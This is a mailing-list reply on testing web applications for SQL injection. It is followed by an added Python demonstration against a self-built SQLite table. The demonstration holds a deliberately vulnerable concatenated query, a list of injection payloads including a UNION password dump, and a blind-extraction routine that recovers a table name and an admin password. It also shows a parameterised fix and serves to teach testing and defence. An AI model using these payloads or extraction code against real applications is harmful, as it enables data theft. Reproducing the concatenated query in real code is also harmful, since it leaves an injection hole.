WebApp Sec mailing list archives
Re: SQL Injection and XSS testing,
From: "Jason Ross" <algorythm () gmail com>
Date: Sat, 24 Feb 2007 22:09:53 -0500
On 2/23/07, IRM <irm () iinet net au> wrote:
> Excuse me for this basic question. Just wondering, in regards to SQL injection, is it sufficient to insert the input "1=1--" to test whether a site is vulnerable to SQL injection?
Absolutely not. For one thing, there are umpty-zillion different variations of "1=1--", some of which may work where others do not, depending on: a) the backend DBMS, b) the code in the application, and c) some third thing I'm sure I've forgotten to mention. Apart from that, however, there are a number of other ways to inject SQL into an application which may work where a simple 1=1 fails.

That said, performing 1=1 tests can be a fairly useful first pass, in that you are likely to reveal some "low hanging fruit", so to speak; but it should by no means be the only thing done before slapping a "not injectable" label on the app (of course, I'm not sure I'm comfortable saying *any* app that talks to a DBMS is "not injectable" ... perhaps "not trivially injectable" ;-) )
> If I am not wrong, I guess most of the security aspects in web applications are mainly around input validation.
I'd tend to agree with this statement, emphasizing that "most" implies that input validation is by no means the only aspect to consider.
> So I was wondering, is there any free open source software to automate all the input?
I highly recommend checking out Absinthe. I find it useful for a number of things, one of them being providing management with a solid idea of exactly how much data one can obtain via an application which is vulnerable. I've found that providing someone with a screenshot of "1=1" with a SQL error on the page (or even a successful login as the first user in the database, for that matter, sadly) does very little. Providing them with a spreadsheet containing all (or a good portion) of the data in the database, along with a documented schema, all gained from a single vulnerable input field, tends to have the desired effect of "um, we should fix that" =)
> Or maybe a list of stuff that usually needs to be tested? Say SQL injection or XSS?
I don't have a cheat sheet link, but wanted to note (the obvious perhaps) that these are two very different things...

--
Jason Ross
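Jason's two points above, that a lone "1=1--" probe proves little and that one vulnerable field is enough to pull out the schema and the data behind it, as an added example that is not part of the original thread and is not code from Absinthe. It assumes an SQLite backend (so the dialect-dependent probes behave as SQLite does, not as MySQL or MSSQL would), a constructed users table with three rows, and a hypothetical blacklist that rejects only the textbook probe; every payload in it is constructed for the demonstration.

```python
# Added example, not code from the original post nor from Absinthe: a deliberately
# vulnerable lookup over an in-memory SQLite database, used to show why one "1=1--"
# probe proves little and how a single boolean oracle yields schema and rows.
# The users table, its rows, the blacklist and every payload are constructed here.
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret',  'admin'),
                         (2, 'alice', 'hunter2', 'user'),
                         (3, 'bob',   'letmein', 'user');
""")


def naive_filter(value: str) -> bool:
    """Hypothetical blacklist that knows only the textbook probe (spaces ignored)."""
    return "1=1" in value.replace(" ", "").lower()


def vulnerable_lookup(username: str) -> list:
    """VULNERABLE on purpose: the value is concatenated into the SQL text."""
    if naive_filter(username):
        raise ValueError("blocked by filter")
    sql = "SELECT id, username, role FROM users WHERE username = '" + username + "'"
    return DB.execute(sql).fetchall()


def safe_lookup(username: str) -> list:
    """Fixed version: a bound parameter is data, never SQL, whatever it contains."""
    return DB.execute(
        "SELECT id, username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Variations on the same idea; which ones "work" depends on the filter and the DBMS.
PROBES = {
    "textbook 1=1":          "' OR 1=1--",
    "spaced 1 = 1":          "' OR 1 = 1 --",
    "string tautology":      "' OR 'a'='a",
    "numeric tautology":     "' OR 2>1--",
    "comment as whitespace": "'/**/OR/**/2>1--",
    "mysql-style # comment": "' OR 'a'='a'#",      # '#' is not a comment in SQLite
    "union exfiltration":    "' UNION SELECT id, password, role FROM users--",
}


def run_probes() -> dict:
    """Map each probe name to (outcome, rows); outcome is 'rows', 'blocked' or 'error'."""
    results = {}
    for name, payload in PROBES.items():
        try:
            results[name] = ("rows", vulnerable_lookup(payload))
        except ValueError:
            results[name] = ("blocked", [])
        except sqlite3.Error as exc:           # dialect mismatch shows up as a syntax error
            results[name] = ("error", [str(exc)])
    return results


def oracle(condition: str) -> bool:
    """Boolean oracle: the admin row comes back only when `condition` is true."""
    return len(vulnerable_lookup(f"admin' AND ({condition})--")) == 1


def blind_extract(expr: str, max_len: int = 64) -> tuple:
    """Recover the string value of SQL expression `expr` through the oracle alone,
    bisecting each character's code point (7 requests per ASCII character).
    Returns (recovered_value, request_count)."""
    out, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                         # ASCII only, for the demo
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:                             # past the end: substr() is '' -> no row
            break
        out += chr(lo)
    return out, requests


def dump_via_blind_injection() -> dict:
    """What a tool like Absinthe automates: the schema first, then the data."""
    table, n1 = blind_extract("SELECT name FROM sqlite_master WHERE type='table'")
    secret, n2 = blind_extract(f"SELECT password FROM {table} WHERE username='admin'")
    return {"table": table, "admin_password": secret, "requests": n1 + n2}


if __name__ == "__main__":
    for name, (outcome, rows) in run_probes().items():
        print(f"{name:24s} {outcome:8s} {rows}")
    print(dump_via_blind_injection())
    print("parameterised lookup:", safe_lookup("' OR 'a'='a"))
```

Running it shows the pattern Jason describes: both spellings of 1=1 are "blocked", so a tester who stops there would call the field clean, while the string and numeric tautologies, the comment-as-whitespace variant and the UNION probe all return every row (the UNION one with passwords in the username column). The `#` probe fails with a syntax error on SQLite although it would succeed on MySQL, which is the backend dependence he mentions. The blind dump needs no error message or visible data at all, just a true/false difference in the response, and recovers the table name and the admin password in 91 requests; the parameterised `safe_lookup` returns nothing for the same payloads.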